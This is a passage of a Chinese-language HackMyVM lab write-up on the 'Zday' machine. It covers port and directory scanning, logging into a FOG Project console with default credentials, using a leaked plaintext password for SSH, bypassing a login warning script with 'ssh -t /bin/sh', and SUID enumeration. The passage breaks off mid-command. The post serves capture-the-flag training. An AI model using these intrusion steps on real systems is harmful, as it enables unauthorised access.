{"id":878,"date":"2025-06-14T23:56:21","date_gmt":"2025-06-14T15:56:21","guid":{"rendered":"http:\/\/162.14.82.114\/?p=878"},"modified":"2025-06-14T23:56:21","modified_gmt":"2025-06-14T15:56:21","slug":"hmv-_-zday","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/878\/06\/14\/2025\/","title":{"rendered":"hmv[-_-]Zday"},"content":{"rendered":"<h1>Zday<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355703.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355703.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250613212601500\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355705.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355705.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614125319433\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.101:21\nOpen 192.168.10.101:80\nOpen 192.168.10.101:111\nOpen 192.168.10.101:443\nOpen 192.168.10.101:22\nOpen 192.168.10.101:2049\nOpen 192.168.10.101:3306\nOpen 192.168.10.101:33269\nOpen 192.168.10.101:38597\nOpen 192.168.10.101:43967\nOpen 192.168.10.101:57163\n\nPORT      STATE SERVICE  REASON         VERSION\n21\/tcp    open  ftp      syn-ack ttl 64 vsftpd 3.0.3\n22\/tcp    open  ssh      syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 ee:01:82:dc:7a:00:0e:0e:fc:d9:08:ca:d8:7e:e5:2e (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDb8c11ZfAFQlWae9AFKD\/+qO6\/CQk\/5gupdrYoYCPR3eDEJeAab4rBHIejTWNW+k8vcPt632eGkauTuqIns+5gPEYh4mzHqjVsV1zcw7uTeIQbC94lrS3prhaFBnUcq69C9xIeAqO\/DKxiziuurpThhmiJfXY15mbhrpfUYupMFD\/voTA9YCfWN8ZYuOVqxNLp9R8te8G3qjRzGgmJpB7ze0lpVY8gYy9L7W\/WhUJcOZu0tv1FCWXaPYNOyiqB6RxuO5B9bZN6e4qpysT3uh41LfRehM\/8+1A3MX9zLjwJDwvt8a8Ou7Hm+ry5YiP8AY4qPX76HUImnVhSYZ0ImLdJ\n|   256 44:af:47:d8:9f:ea:ae:3e:9f:aa:ec:1d:fb:22:aa:0f (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNYvN0uTaP4+w1s6xKfWhwDMsazhYYGfxu9t3YTJSlCMkfF5+qxoUrsnBrrP2W158sVb\/Dn0G31HWSmCuzrEG24=\n|   256 6a:fb:b4:13:64:df:6e:75:b2:b9:4e:f1:92:97:72:30 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINnksPNobxAvrBwITV+97e9Zuyt2kviSa6QiFGUavqDS\n80\/tcp    open  http     syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-title: Apache2 Debian Default Page: It works\n|_http-server-header: Apache\/2.4.38 (Debian)\n111\/tcp   open  rpcbind  syn-ack ttl 64 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100003  3           2049\/udp   nfs\n|   100003  3           2049\/udp6  nfs\n|   100003  3,4         2049\/tcp   nfs\n|   100003  3,4         2049\/tcp6  nfs\n|   100005  1,2,3      32986\/udp   mountd\n|   100005  1,2,3      33269\/tcp   mountd\n|   100005  1,2,3      50373\/tcp6  mountd\n|   100005  1,2,3      57610\/udp6  mountd\n|   100021  1,3,4      38098\/udp6  nlockmgr\n|   100021  1,3,4      38597\/tcp   nlockmgr\n|   100021  1,3,4      41313\/tcp6  nlockmgr\n|   100021  1,3,4      57425\/udp   nlockmgr\n|   100227  3           2049\/tcp   nfs_acl\n|   100227  3           2049\/tcp6  nfs_acl\n|   100227  3           2049\/udp   nfs_acl\n|_  100227  3           2049\/udp6  nfs_acl\n443\/tcp   open  http     syn-ack ttl 64 Apache httpd 2.4.38\n|_http-server-header: Apache\/2.4.38 (Debian)\n|_http-title: Apache2 Debian Default Page: It works\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n2049\/tcp  open  nfs      syn-ack ttl 64 3-4 (RPC #100003)\n3306\/tcp  open  mysql    syn-ack ttl 64 MariaDB 5.5.5-10.3.27\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1\n|   Thread ID: 89\n|   Capabilities flags: 63486\n|   Some Capabilities: InteractiveClient, SupportsTransactions, ConnectWithDatabase, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, Support41Auth, ODBCClient, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, FoundRows, SupportsLoadDataLocal, SupportsCompression, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults\n|   Status: Autocommit\n|   Salt: _K8xt^X|-f;2(r(ke8&#039;W\n|_  Auth Plugin Name: mysql_native_password\n33269\/tcp open  mountd   syn-ack ttl 64 1-3 (RPC #100005)\n38597\/tcp open  nlockmgr syn-ack ttl 64 1-4 (RPC #100021)\n43967\/tcp open  mountd   syn-ack ttl 64 1-3 (RPC #100005)\n57163\/tcp open  mountd   syn-ack ttl 64 1-3 (RPC #100005)\nMAC Address: 08:00:27:75:4B:D0 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2&gt;\/dev\/null\n\n404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n404      GET        1l        3w       16c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET      368l      933w    10701c http:\/\/192.168.10.101\/index.html\n302      GET        0l        0w        0c http:\/\/192.168.10.101\/index.php =&gt; http:\/\/192.168.10.101\/fog\/index.php\n200      GET       24l      126w    10356c http:\/\/192.168.10.101\/icons\/openlogo-75.png\n200      GET      368l      933w    10701c http:\/\/192.168.10.101\/\n301      GET        9l       28w      314c http:\/\/192.168.10.101\/fog =&gt; http:\/\/192.168.10.101\/fog\/\n302      GET        0l        0w        0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n301      GET        9l       28w      322c http:\/\/192.168.10.101\/fog\/service =&gt; http:\/\/192.168.10.101\/fog\/service\/\n301      GET        9l       28w      325c http:\/\/192.168.10.101\/fog\/management =&gt; http:\/\/192.168.10.101\/fog\/management\/\n301      GET        9l       28w      326c http:\/\/192.168.10.101\/fog\/fog\/service =&gt; http:\/\/192.168.10.101\/fog\/fog\/service\/\n301      GET        9l       28w      329c http:\/\/192.168.10.101\/fog\/fog\/management =&gt; http:\/\/192.168.10.101\/fog\/fog\/management\/\n301      GET        9l       28w      336c http:\/\/192.168.10.101\/fog\/fog\/management\/images =&gt; http:\/\/192.168.10.101\/fog\/fog\/management\/images\/\n301      GET        9l       28w      332c http:\/\/192.168.10.101\/fog\/management\/images =&gt; http:\/\/192.168.10.101\/fog\/management\/images\/\n301      GET        9l       28w      318c http:\/\/192.168.10.101\/fog\/lib =&gt; http:\/\/192.168.10.101\/fog\/lib\/\n301      GET        9l       28w      321c http:\/\/192.168.10.101\/fog\/status =&gt; http:\/\/192.168.10.101\/fog\/status\/\n301      GET        9l       28w      335c http:\/\/192.168.10.101\/fog\/fog\/management\/other =&gt; http:\/\/192.168.10.101\/fog\/fog\/management\/other\/\n301      GET        9l       28w      329c http:\/\/192.168.10.101\/fog\/fog\/lib\/events =&gt; http:\/\/192.168.10.101\/fog\/fog\/lib\/events\/\n301      GET        9l       28w      322c http:\/\/192.168.10.101\/fog\/fog\/lib =&gt; http:\/\/192.168.10.101\/fog\/fog\/lib\/\n301      GET        9l       28w      324c http:\/\/192.168.10.101\/fog\/lib\/pages =&gt; http:\/\/192.168.10.101\/fog\/lib\/pages\/\n301      GET        9l       28w      328c http:\/\/192.168.10.101\/fog\/fog\/lib\/pages =&gt; http:\/\/192.168.10.101\/fog\/fog\/lib\/pages\/<\/code><\/pre>\n<p>\u6ca1\u6df1\u5165\u626b\u4e86\uff0c\u611f\u89c9\u6ca1\u5565\u4e86\u3002\u3002\u3002<\/p>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u654f\u611f\u7aef\u53e3\u63a2\u6d4b<\/h3>\n<p>\u6ca1\u626b\u51fa\u6765\u533f\u540d\u767b\u5f55\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff0c\u53d1\u73b0\u5931\u8d25\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ lftp $IP\nlftp 192.168.10.101:~&gt; ls                          \n`ls&#039; at 0 [530 Login incorrect.] <\/code><\/pre>\n<h3>\u654f\u611f\u76ee\u5f55<\/h3>\n<p>\u770b\u4e00\u4e0b\u8fd9\u4e2a<code>fog<\/code>\u76ee\u5f55\u662f\u4e2a\u5565\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ whatweb http:\/\/$IP\/fog                                                                   \nhttp:\/\/192.168.10.101\/fog [301 Moved Permanently] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[192.168.10.101], RedirectLocation[http:\/\/192.168.10.101\/fog\/], Title[301 Moved Permanently]\nhttp:\/\/192.168.10.101\/fog\/ [302 Found] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[192.168.10.101], RedirectLocation[.\/management\/index.php]\nhttp:\/\/192.168.10.101\/fog\/management\/index.php [200 OK] Apache[2.4.38], Bootstrap[135], Cookies[PHPSESSID], Country[RESERVED][ZZ], Email[fogproject.org@gmail.com], HTML5, HTTPServer[Debian Linux][Apache\/2.4.38 (Debian)], IP[192.168.10.101], JQuery, PasswordField[upass], Script[text\/javascript], Strict-Transport-Security[max-age=31536000], Title[Login], UncommonHeaders[x-content-type-options,content-security-policy,access-control-allow-origin], X-Frame-Options[sameorigin], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block]<\/code><\/pre>\n<p>\u6ca1\u5565\u6536\u83b7\uff0c\u53ea\u80fd\u627e\u5230\u4e00\u4e2a\u767b\u5f55\u754c\u9762\u3002\u3002\u3002\u3002\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355707.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355707.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614130205146\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u9ed8\u8ba4\u7528\u6237\u767b\u5f55<\/h3>\n<p>\u7b80\u5355\u67e5\u4e86\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\u4f46\u662f\u4e0d\u77e5\u9053\u7248\u672c\u4fe1\u606f\uff0c\u8fd9\u662f\u4e00\u4e2a\u5f00\u6e90\u9879\u76ee\uff0c\u53ef\u4ee5\u5728\u4e0b\u9762\u7684\u81f4\u8c22\u680f\u770b\u5230\u76f8\u5173\u4fe1\u606f\uff0c\u9996\u5148\u60f3\u7684\u662f\u662f\u5426\u53ef\u4ee5\u4f7f\u7528\u9ed8\u8ba4\u7528\u6237\u5bc6\u7801\u8fdb\u884c\u767b\u5f55\uff0c\u4e0d\u884c\u518d\u5c1d\u8bd5sql\u6ce8\u5165\uff0c\u518d\u4e0d\u884c\u518d\u8003\u8651\u5176\u4ed6\u6e20\u9053\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff0c\u4f46\u662f\u53d1\u73b0\u9ed8\u8ba4\u7528\u6237\u53ef\u4ee5\u8fdb\u884c\u767b\u5f55\uff01\uff01\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355708.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355708.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614130648746\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u6216\u8005\uff1a<a href=\"https:\/\/wiki.fogproject.org\/wiki\/index.php?title=Password_Central\">https:\/\/wiki.fogproject.org\/wiki\/index.php?title=Password_Central<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355709.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355709.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614130721336\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355710.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355710.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614130834975\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u770b\u662f\u5426\u5b58\u5728\u53ef\u4ee5\u6267\u884c\u547d\u4ee4\u7684\u5730\u65b9\uff0c\u6ca1\u53d1\u73b0\uff0c\u4f46\u662f\u770b\u5230\u4e86\u522b\u7684\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355711.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355711.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614131128379\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u627e\u5230\u4e86\u7248\u672c\u53f7\uff0c\u6ca1\u5207\u5165\u70b9\u53ef\u4ee5\u5c1d\u8bd5 google \u5386\u53f2\u6f0f\u6d1e\uff0c\u7136\u540e\u627e\u5230\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355712.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355712.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614131431559\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e00\u5904\u51ed\u8bc1\u4e3a<code>fogproject:84D1gia!8M9HSsR8gXau<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ ssh fogproject@$IP\nThe authenticity of host &#039;192.168.10.101 (192.168.10.101)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:QFnr8PHYAdXYbwD9yLU2dbRjl4cTUg0VRu+X+5GzDw8.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;192.168.10.101&#039; (ED25519) to the list of known hosts.\nfogproject@192.168.10.101&#039;s password: \nLinux zday 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nYou seem to be using the &#039;fogproject&#039; system account to logon and work \non your FOG server system.\n\nIt&#039;s NOT recommended to use this account! Please create a new \naccount for administrative tasks.\n\nIf you re-run the installer it would reset the &#039;fog&#039; account \npassword and therefore lock you out of the system!\n\nTake care, \nyour FOGproject team\nConnection to 192.168.10.101 closed.<\/code><\/pre>\n<p>\u88ab\u62e6\u622a\u4e0b\u6765\u4e86\uff0c\u8fd9\u662f\u51fa\u4e8e\u5b89\u5168\u8003\u8651\uff1f\u5c1d\u8bd5\u7ed5\u8fc7\uff1a<\/p>\n<pre><code class=\"language-bash\"># ssh fogproject@$IP -t bash --noprofile\n# ssh fogproject@$IP -t \/bin\/bash                                          \n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ ssh fogproject@$IP -t \/bin\/sh  \nfogproject@192.168.10.101&#039;s password: 84D1gia!8M9HSsR8gXau\n$ whoami;id\nfogproject\nuid=1001(fogproject) gid=1001(fogproject) groups=1001(fogproject)<\/code><\/pre>\n<p>\u53d1\u73b0<code>sh<\/code>\u53ef\u4ee5\u6b63\u5e38\u4f7f\u7528\uff01\uff01\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355713.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355713.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614131853476\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">$ pwd\n\/home\/fogproject\n$ ls -la\ntotal 32\ndrwxr-xr-x 4 fogproject fogproject 4096 Jun 14 01:15 .\ndrwxr-xr-x 4 root       root       4096 Mar 10  2021 ..\n-rw-r--r-- 1 fogproject fogproject  220 Apr 18  2019 .bash_logout\n-rw-r--r-- 1 fogproject fogproject 3899 Mar 10  2021 .bashrc\ndrwxr-xr-x 3 fogproject fogproject 4096 Mar 10  2021 .config\ndrwx------ 3 fogproject fogproject 4096 Jun 14 01:15 .gnupg\n-rw-r--r-- 1 fogproject fogproject  807 Apr 18  2019 .profile\n-rwxr-xr-x 1 fogproject fogproject  681 Mar 10  2021 warnfogaccount.sh\n$ cat warnfogaccount.sh\n#!\/bin\/bash\ntitle=&quot;FOG system account&quot;\ntext=&quot;You seem to be using the &#039;fogproject&#039; system account to logon and work \\non your FOG server system.\\n\\nIt&#039;s NOT recommended to use this account! Please create a new \\naccount for administrative tasks.\\n\\nIf you re-run the installer it would reset the &#039;fog&#039; account \\npassword and therefore lock you out of the system!\\n\\nTake care, \\nyour FOGproject team&quot;\nz=$(which zenity)\nx=$(which xmessage)\nn=$(which notify-send)\nif [[ -x &quot;$z&quot; ]]\nthen\n    $z --error --width=480 --text=&quot;$text&quot; --title=&quot;$title&quot;\nelif [[ -x &quot;$x&quot; ]]\nthen\n    echo -e &quot;$text&quot; | $x -center -file -\nelse\n    $n -u critical &quot;$title&quot; &quot;$(echo $text | sed -e &#039;s\/ \\n\/ \/g&#039;)&quot;\nfi<\/code><\/pre>\n<p>\u6b64\u811a\u672c\u7528\u4e8e<strong>\u68c0\u6d4b\u5e76\u8b66\u544a\u7528\u6237\u907f\u514d\u4f7f\u7528<code>fogproject<\/code>\u7cfb\u7edf\u8d26\u6237\u767b\u5f55FOG\u670d\u52a1\u5668<\/strong>\u3002\u901a\u8fc7\u4e09\u79cd\u53ef\u80fd\u7684\u56fe\u5f62\/\u901a\u77e5\u5de5\u5177\uff08<code>zenity<\/code>\u3001<code>xmessage<\/code>\u3001<code>notify-send<\/code>\uff09\u4e4b\u4e00\u5f39\u51fa\u8b66\u544a\u6d88\u606f\uff0c\u4f18\u5148\u7ea7\u4ece\u9ad8\u5230\u4f4e\u4f9d\u6b21\u5c1d\u8bd5\u3002<\/p>\n<p>\u5c1d\u8bd5\u5220\u9664\u518d\u8fdb\u8bd5\u8bd5\uff0c\u53d1\u73b0\u8fd8\u662f\u53ea\u80fd<code>sh<\/code><\/p>\n<pre><code class=\"language-bash\">$ bash\nYou seem to be using the &#039;fogproject&#039; system account to logon and work \non your FOG server system.\n\nIt&#039;s NOT recommended to use this account! Please create a new \naccount for administrative tasks.\n\nIf you re-run the installer it would reset the &#039;fog&#039; account \npassword and therefore lock you out of the system!\n\nTake care, \nyour FOGproject team<\/code><\/pre>\n<pre><code class=\"language-bash\">$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for fogproject: \nSorry, user fogproject may not run sudo on zday.\n$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n$ echo 1\n1\n$ find \/ -perm -u=s -type f 2&gt;\/dev\/null &gt; \/tmp\/log\n$ cat \/tmp\/log\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/sbin\/mount.nfs\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/passwd\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/chsh\n$ cat 